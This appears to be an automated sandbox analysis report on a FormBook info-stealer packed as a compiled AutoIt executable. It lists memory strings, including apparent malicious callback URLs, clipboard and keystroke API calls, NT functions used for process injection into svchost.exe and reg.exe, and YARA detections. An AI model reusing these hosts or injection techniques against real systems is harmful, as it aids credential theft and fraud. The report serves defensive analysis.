                Source: reg.exe, 00000004.00000002.3581535514.00000000047E0000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004230000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: reg.exe, 00000004.00000002.3581535514.0000000004E28000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004878000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: reg.exe, 00000004.00000002.3581535514.0000000004E28000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004878000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: reg.exe, 00000004.00000002.3581535514.0000000004E28000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004878000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=OTBsRjBnODhKQm9QeHMvb2FBeXd1NXBROFBjbmhwQ2ZyV3h4L2pze
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3583192639.0000000005964000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.super-mist.store
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3583192639.0000000005964000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.super-mist.store/l6hh/
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000003A56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: reg.exe, 00000004.00000003.1461349525.0000000007DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: reg.exe, 00000004.00000002.3581535514.0000000005470000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000004.00000002.3583643945.0000000006380000.00000004.00000800.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.000000000464E000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004EC0000.00000004.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.000000000409E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: reg.exe, 00000004.00000002.3581535514.0000000004C96000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000046E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.utzp.top/d478/?SDCxHX=yZiSYoN2a3htTd2ewqQl0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00204164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00204164
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00204164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00204164
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00203F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00203F66
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_001F001C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_0021CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0021CABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1257841114.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3581016954.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1258855778.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: This is a third-party compiled AutoIt script.0_2_00193B3A
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000000.1113315439.0000000000244000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4f307dee-5
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000000.1113315439.0000000000244000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_939abd7d-0
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_61ace4ff-a
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f1f46ea9-f
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C8E3 NtClose,2_2_0042C8E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,2_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D4340 NtSetContextThread,LdrInitializeThunk,4_2_034D4340
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D4650 NtSuspendThread,LdrInitializeThunk,4_2_034D4650
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2B60 NtClose,LdrInitializeThunk,4_2_034D2B60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_034D2BE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034D2BF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034D2BA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2AD0 NtReadFile,LdrInitializeThunk,4_2_034D2AD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2AF0 NtWriteFile,LdrInitializeThunk,4_2_034D2AF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2F30 NtCreateSection,LdrInitializeThunk,4_2_034D2F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2FE0 NtCreateFile,LdrInitializeThunk,4_2_034D2FE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2FB0 NtResumeThread,LdrInitializeThunk,4_2_034D2FB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_034D2EE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_034D2E80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_034D2D10
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034D2D30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2DD0 NtDelayExecution,LdrInitializeThunk,4_2_034D2DD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_034D2DF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2C60 NtCreateKey,LdrInitializeThunk,4_2_034D2C60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034D2C70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_034D2CA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D35C0 NtCreateMutant,LdrInitializeThunk,4_2_034D35C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D39B0 NtGetContextThread,LdrInitializeThunk,4_2_034D39B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2B80 NtQueryInformationFile,4_2_034D2B80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2AB0 NtWaitForSingleObject,4_2_034D2AB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2F60 NtCreateProcessEx,4_2_034D2F60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2F90 NtProtectVirtualMemory,4_2_034D2F90
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2FA0 NtQuerySection,4_2_034D2FA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2E30 NtWriteVirtualMemory,4_2_034D2E30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2EA0 NtAdjustPrivilegesToken,4_2_034D2EA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2D00 NtSetInformationFile,4_2_034D2D00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2DB0 NtEnumerateKey,4_2_034D2DB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2C00 NtQueryInformationProcess,4_2_034D2C00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2CC0 NtQueryVirtualMemory,4_2_034D2CC0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2CF0 NtOpenProcess,4_2_034D2CF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3010 NtOpenDirectoryObject,4_2_034D3010
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3090 NtSetValueKey,4_2_034D3090
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3D70 NtOpenThread,4_2_034D3D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3D10 NtOpenProcessToken,4_2_034D3D10
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79200 NtCreateFile,4_2_02C79200
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79370 NtReadFile,4_2_02C79370
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79670 NtAllocateVirtualMemory,4_2_02C79670
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79460 NtDeleteFile,4_2_02C79460
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79500 NtClose,4_2_02C79500
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_001FA1EF
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001E8310
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001F51BD
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_0019E6A00_2_0019E6A0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001BD9750_2_001BD975
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_0019FCE00_2_0019FCE0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B21C50_2_001B21C5
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C62D20_2_001C62D2
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_002103DA0_2_002103DA
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C242E0_2_001C242E
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B25FA0_2_001B25FA
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001EE6160_2_001EE616
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001A66E10_2_001A66E1
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C878F0_2_001C878F
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001A88080_2_001A8808
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C68440_2_001C6844
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_002108570_2_00210857
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F88890_2_001F8889
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001BCB210_2_001BCB21
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C6DB60_2_001C6DB6
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001A6F9E0_2_001A6F9E
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001A30300_2_001A3030
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B31870_2_001B3187
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001BF1D90_2_001BF1D9
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001912870_2_00191287
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B14840_2_001B1484
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001A55200_2_001A5520
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B76960_2_001B7696
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001A57600_2_001A5760
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B19780_2_001B1978
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001C9AB50_2_001C9AB5
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001B1D900_2_001B1D90
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001BBDA60_2_001BBDA6
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00217DDB0_2_00217DDB
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_0019DF000_2_0019DF00
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001A3FE00_2_001A3FE0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_010A23D00_2_010A23D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004187E32_2_004187E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041001A2_2_0041001A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100232_2_00410023
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040282C2_2_0040282C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004028302_2_00402830
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031602_2_00403160
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011102_2_00401110
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169DE2_2_004169DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004169E32_2_004169E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102432_2_00410243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012602_2_00401260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E2332_2_0040E233
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3772_2_0040E377
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004023202_2_00402320
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E3832_2_0040E383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C422_2_00402C42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402C502_2_00402C50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040258D2_2_0040258D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025902_2_00402590
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EEB32_2_0042EEB3
